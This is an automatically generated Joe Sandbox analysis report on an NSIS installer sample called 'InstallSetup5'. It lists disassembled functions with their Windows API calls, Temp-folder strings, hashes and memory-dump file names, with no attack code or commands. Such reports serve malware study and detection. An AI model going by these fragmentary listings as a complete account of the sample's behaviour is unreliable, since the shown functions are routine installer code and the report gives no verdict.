Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction ID: b4a4546c530c1255e03538258eeb387f0310dfe45b0532776fb26864182fd6cc
Opcode Fuzzy Hash: 492ce7ecf44becc2b6f328ccb1258d65c9f2870c51930cf6044baf7ee7e6d13e
Instruction Fuzzy Hash: 8D014F71640208BBEF209F60DE49FEE3B79AB04344F108039FA02B91D0DBB99A559B59

Uniqueness

Uniqueness Score: -1.00%

Function 00402955 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B6
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029D2
GlobalFree.KERNEL32(?), ref: 00402A0B
GlobalFree.KERNEL32(00000000), ref: 00402A1E
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A3A
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A4D

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: bce569f9812bba37990cf9c23fa7c44f4211c5a4fa57b4e7c5ebecb75cd2c75b
Instruction ID: 9240dae09012554c896714223f9a1d047de53ad28ef79bac3653223f28d0231c
Opcode Fuzzy Hash: bce569f9812bba37990cf9c23fa7c44f4211c5a4fa57b4e7c5ebecb75cd2c75b
Instruction Fuzzy Hash: 3931AD71D00124BBCF21AFA5CE89D9E7E79AF49324F10423AF521762E1CB794D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402EAE Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CloseEnum$DeleteValue
String ID:
API String ID: 1354259210-0
Opcode ID: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction ID: 7c59605d0ca35e0e1f1170af87acd2d95b5481229a772e02f8b12e0d157fbf49
Opcode Fuzzy Hash: 2404979ab5d72bd1f47e4c5d2100d154d2dcf156ce7fec90999c2a50aae3b712
Instruction Fuzzy Hash: 2A216B7150010ABFDF119F90CE89EEF7B7DEB54398F100076B949B21E0D7B49E54AA68

Uniqueness

Uniqueness Score: -1.00%

Function 00401D86 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9F
GetClientRect.USER32(?,?), ref: 00401DEA
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E1A
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E2E
DeleteObject.GDI32(00000000), ref: 00401E3E

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction ID: ff9804e90d7d2423da96771145ec8c84d1acc30631874d8c14b803c0354ed8c3
Opcode Fuzzy Hash: 5a50ccc3029d5fde6ea81844b1e337cdf63f6177f9f2d7308e11f2af529302b6
Instruction Fuzzy Hash: 73210772900119AFCB05DF98EE45AEEBBB5EF08314F14003AF945F62A0D7789D81DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401E53 Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E56
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E70
MulDiv.KERNEL32(00000000,00000000), ref: 00401E78
ReleaseDC.USER32(?,00000000), ref: 00401E89
CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED8

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction ID: a825ad976d3f878f3d1ae6f085165680ecf176d60430839047bda31eedf7821d
Opcode Fuzzy Hash: ecb0f290f5c1122776e84f7afc2181d255ab8ed52f1adad26d3dddab1dbe2d45
Instruction Fuzzy Hash: 62017571905240EFE7005BB4EE49BDD3FA4AB15301F10867AF541B61E2C7B904458BED

Uniqueness

Uniqueness Score: -1.00%

Function 00401C48 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB8
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CD0

Strings

!, xrefs: 00401C84

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction ID: 3d1946e732457e70d46414fe723373bc78a31951f468440fe5e33f287296c6aa
Opcode Fuzzy Hash: 069d8cd0b50c9c3d23d30c496d0653b5436aef65d2998253063e1abfe41eec6a
Instruction Fuzzy Hash: BC21AD71D1421AAFEB05AFA4D94AAFE7BB0EF84304F10453EF601B61D0D7B84941DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00404D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
wsprintfW.USER32 ref: 00404E2D
SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

%u.%u%s%s, xrefs: 00404E0E

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction ID: 0fe25742dfe6cfa92c38baccc724587d3b65f537d6828788df476db8ac6fa50e
Opcode Fuzzy Hash: 2c674a3dc48973326ebd454f1002488dce618ddc5f98b18a2ee0300ee1e706a4
Instruction Fuzzy Hash: B111EB336042283BDB109A6DAC45E9E329CDF85374F250237FA65F71D1E978DC2282E8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F2E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 00405ED1: CharNextW.USER32(?,?,0042F270,?,00405F45,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

lstrlenW.KERNEL32(0042F270,00000000,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
GetFileAttributesW.KERNEL32(0042F270,0042F270,0042F270,0042F270,0042F270,0042F270,00000000,0042F270,0042F270, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97

Strings

4#v, xrefs: 00405F30
C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2E

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: 4#v$C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3758603893
Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE

Uniqueness

Uniqueness Score: -1.00%

Function 00405E26 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E2C
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00405E36
lstrcatW.KERNEL32(?,0040A014), ref: 00405E48

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405E26

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: dcb1dcffde27bcde4b46a4bd7655c85b8e924b1ae314dab144fc932f30a80b76
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 9DD0A731501534BAC212AB54AD04DDF62AC9F46344381443BF141B30A5C77C5D51D7FD

Uniqueness

Uniqueness Score: -1.00%

Function 0040301E Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,004031FC,00000001), ref: 00403031
GetTickCount.KERNEL32 ref: 0040304F
CreateDialogParamW.USER32(0000006F,00000000,00402F98,00000000), ref: 0040306C
ShowWindow.USER32(00000000,00000005), ref: 0040307A

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040557F
CallWindowProcW.USER32(?,?,?,?), ref: 004055D0

Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534

Strings

, xrefs: 00405560

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,76233420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
GlobalFree.KERNEL32(00000000), ref: 00403BB5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3936084776
Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC

Uniqueness

Uniqueness Score: -1.00%

Function 00405E72 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\AppData\Local\Temp,004030EE,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00442800,00442800,80000000,00000003), ref: 00405E78
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\AppData\Local\Temp,004030EE,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,00442800,00442800,80000000,00000003), ref: 00405E88

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00405E72

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.4559551876.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562411174.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000431000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4562560149.0000000000440000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000445000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000447000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000465000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.4565248612.0000000000485000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallSetup5.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 2709904686-1104044542
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: c6f1eefeac9f22653a6718740f6635ad40246fc98af2d22d27e4b5974eb8f820
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: E1D0A7B3400930EEC312AB04EC04DAF73ACEF123007868827F980A7165D7785D81C6EC

Uniqueness

Uniqueness Score: -1.00%

Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE

Memory Dump Source

Source File: 00000002.00000002.4560526294.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

